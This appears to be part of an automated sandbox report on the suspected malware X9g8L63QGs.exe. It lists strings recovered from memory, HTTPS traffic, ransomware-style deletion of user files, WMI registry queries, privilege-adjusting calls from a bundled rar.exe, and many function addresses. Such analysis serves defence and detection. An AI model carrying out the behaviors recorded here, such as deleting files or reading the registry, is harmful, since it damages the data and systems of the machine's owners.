              Source: X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3983000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3A10000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1431878807.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1423636617.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3A20000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EBB000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1592523972.000001E7C3A8A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1690170405.000001E7C3A89000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38B4000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1709775944.000001E7C3A8A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EB4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1711482875.00007FFB0BA99000.00000004.00000001.01000000.00000011.sdmp, X9g8L63QGs.exe, 00000007.00000002.1712549719.00007FFB0BFAA000.00000004.00000001.01000000.00000010.sdmp, libcrypto-3.dll.4.drString found in binary or memory: https://www.openssl.org/H
              Source: X9g8L63QGs.exe, 00000007.00000002.1713477885.00007FFB0C724000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.python.org/psf/license/
              Source: X9g8L63QGs.exe, 00000007.00000002.1713477885.00007FFB0C620000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.python.org/psf/license/)
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
              Source: X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: X9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EBB000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1592523972.000001E7C3A8A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1690170405.000001E7C3A89000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38B4000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1709775944.000001E7C3A8A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EB4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691006091.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694260601.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Modifies existing user documents (likely ransomware behavior)
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile deleted: C:\Users\user\AppData\Local\Temp\? ?\Common Files\Desktop\PWZOQIFCAN.jpgJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile deleted: C:\Users\user\AppData\Local\Temp\? ?\Common Files\Desktop\WHZAGPPPLA.mp3Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile deleted: C:\Users\user\AppData\Local\Temp\? ?\Common Files\Desktop\HQJBRDYKDE.mp3Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile deleted: C:\Users\user\AppData\Local\Temp\? ?\Common Files\Desktop\NIRMEKAMZH.pngJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile deleted: C:\Users\user\AppData\Local\Temp\? ?\Common Files\Desktop\VWDFPKGDUF.jpgJump to behavior
              Source: cmd.exeProcess created: 67

              System Summary

              barindex
              Writes or reads registry keys via WMI
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080B3A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,97_2_00007FF7080B3A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080DB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,97_2_00007FF7080DB57C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C2668BD04_2_00007FF7C2668BD0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26809384_2_00007FF7C2680938
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26869D44_2_00007FF7C26869D4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26610004_2_00007FF7C2661000
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C266A34B4_2_00007FF7C266A34B
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C2671BC04_2_00007FF7C2671BC0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26864884_2_00007FF7C2686488
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26809384_2_00007FF7C2680938
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C2683C804_2_00007FF7C2683C80
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C2672C804_2_00007FF7C2672C80
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C2685C704_2_00007FF7C2685C70
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C266A4E44_2_00007FF7C266A4E4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26781544_2_00007FF7C2678154
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C268411C4_2_00007FF7C268411C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C2673A144_2_00007FF7C2673A14
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26721D44_2_00007FF7C26721D4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26719B44_2_00007FF7C26719B4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C267DACC4_2_00007FF7C267DACC
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C267DF604_2_00007FF7C267DF60
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26788044_2_00007FF7C2678804
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C2671FD04_2_00007FF7C2671FD0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26717B04_2_00007FF7C26717B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26897984_2_00007FF7C2689798
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26698704_2_00007FF7C2669870
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26818E44_2_00007FF7C26818E4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C266AD1D4_2_00007FF7C266AD1D
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26736104_2_00007FF7C2673610
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C267E5E04_2_00007FF7C267E5E0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C2671DC44_2_00007FF7C2671DC4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C2675DA04_2_00007FF7C2675DA0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C2679F104_2_00007FF7C2679F10
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C2685EEC4_2_00007FF7C2685EEC
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26869D47_2_00007FF7C26869D4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26610007_2_00007FF7C2661000
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C266A34B7_2_00007FF7C266A34B
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C2668BD07_2_00007FF7C2668BD0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C2671BC07_2_00007FF7C2671BC0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26864887_2_00007FF7C2686488
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26809387_2_00007FF7C2680938
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C2683C807_2_00007FF7C2683C80
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C2672C807_2_00007FF7C2672C80
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C2685C707_2_00007FF7C2685C70
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C266A4E47_2_00007FF7C266A4E4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26781547_2_00007FF7C2678154
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26809387_2_00007FF7C2680938
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C268411C7_2_00007FF7C268411C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C2673A147_2_00007FF7C2673A14
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26721D47_2_00007FF7C26721D4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26719B47_2_00007FF7C26719B4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C267DACC7_2_00007FF7C267DACC
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C267DF607_2_00007FF7C267DF60
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26788047_2_00007FF7C2678804
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C2671FD07_2_00007FF7C2671FD0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26717B07_2_00007FF7C26717B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26897987_2_00007FF7C2689798
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26698707_2_00007FF7C2669870
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26818E47_2_00007FF7C26818E4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C266AD1D7_2_00007FF7C266AD1D
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26736107_2_00007FF7C2673610
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C267E5E07_2_00007FF7C267E5E0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C2671DC47_2_00007FF7C2671DC4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C2675DA07_2_00007FF7C2675DA0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C2679F107_2_00007FF7C2679F10
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C2685EEC7_2_00007FF7C2685EEC
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B12F07_2_00007FFB0B8B12F0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B18807_2_00007FFB0B8B1880
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C039D007_2_00007FFB0C039D00
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C09CF307_2_00007FFB0C09CF30
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0A4C707_2_00007FFB0C0A4C70
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0422507_2_00007FFB0C042250
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0392B07_2_00007FFB0C0392B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0AACA07_2_00007FFB0C0AACA0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C07BCC07_2_00007FFB0C07BCC0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C02BD307_2_00007FFB0C02BD30
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C04DDB07_2_00007FFB0C04DDB0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C030DC07_2_00007FFB0C030DC0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C064E707_2_00007FFB0C064E70
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0BCEA07_2_00007FFB0C0BCEA0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0D4FC07_2_00007FFB0C0D4FC0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0ABFC07_2_00007FFB0C0ABFC0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0480207_2_00007FFB0C048020
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0470407_2_00007FFB0C047040
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C02A8C07_2_00007FFB0C02A8C0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0369307_2_00007FFB0C036930
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0829507_2_00007FFB0C082950
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0499A07_2_00007FFB0C0499A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C02FA107_2_00007FFB0C02FA10
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C08BB007_2_00007FFB0C08BB00
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C084B207_2_00007FFB0C084B20
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C076B407_2_00007FFB0C076B40
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C029B907_2_00007FFB0C029B90
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0D2BF07_2_00007FFB0C0D2BF0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C023C107_2_00007FFB0C023C10
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C05CC597_2_00007FFB0C05CC59
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C07CC407_2_00007FFB0C07CC40
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C03CC407_2_00007FFB0C03CC40
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0B8C807_2_00007FFB0C0B8C80
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0C54A07_2_00007FFB0C0C54A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0294D07_2_00007FFB0C0294D0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C06A5107_2_00007FFB0C06A510
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0245707_2_00007FFB0C024570
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C07B5B07_2_00007FFB0C07B5B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0515A07_2_00007FFB0C0515A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0445A07_2_00007FFB0C0445A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C04E5C07_2_00007FFB0C04E5C0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0336507_2_00007FFB0C033650
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C07E6707_2_00007FFB0C07E670
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0806C07_2_00007FFB0C0806C0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0977507_2_00007FFB0C097750
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0927E67_2_00007FFB0C0927E6
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0248207_2_00007FFB0C024820
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C08C8407_2_00007FFB0C08C840
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C02288E7_2_00007FFB0C02288E
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0658807_2_00007FFB0C065880
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C1540B07_2_00007FFB0C1540B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0241207_2_00007FFB0C024120
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0321E07_2_00007FFB0C0321E0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C03D2B07_2_00007FFB0C03D2B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0E42B07_2_00007FFB0C0E42B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C06F2D07_2_00007FFB0C06F2D0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C04F2F07_2_00007FFB0C04F2F0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0232F57_2_00007FFB0C0232F5
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C04D3107_2_00007FFB0C04D310
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0AA3007_2_00007FFB0C0AA300
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0273367_2_00007FFB0C027336
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0873507_2_00007FFB0C087350
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C03C3807_2_00007FFB0C03C380
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C0943B07_2_00007FFB0C0943B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C1544187_2_00007FFB0C154418
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C1543F07_2_00007FFB0C1543F0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C1A7C487_2_00007FFB0C1A7C48
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1AB121D07_2_00007FFB1AB121D0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1AB015807_2_00007FFB1AB01580
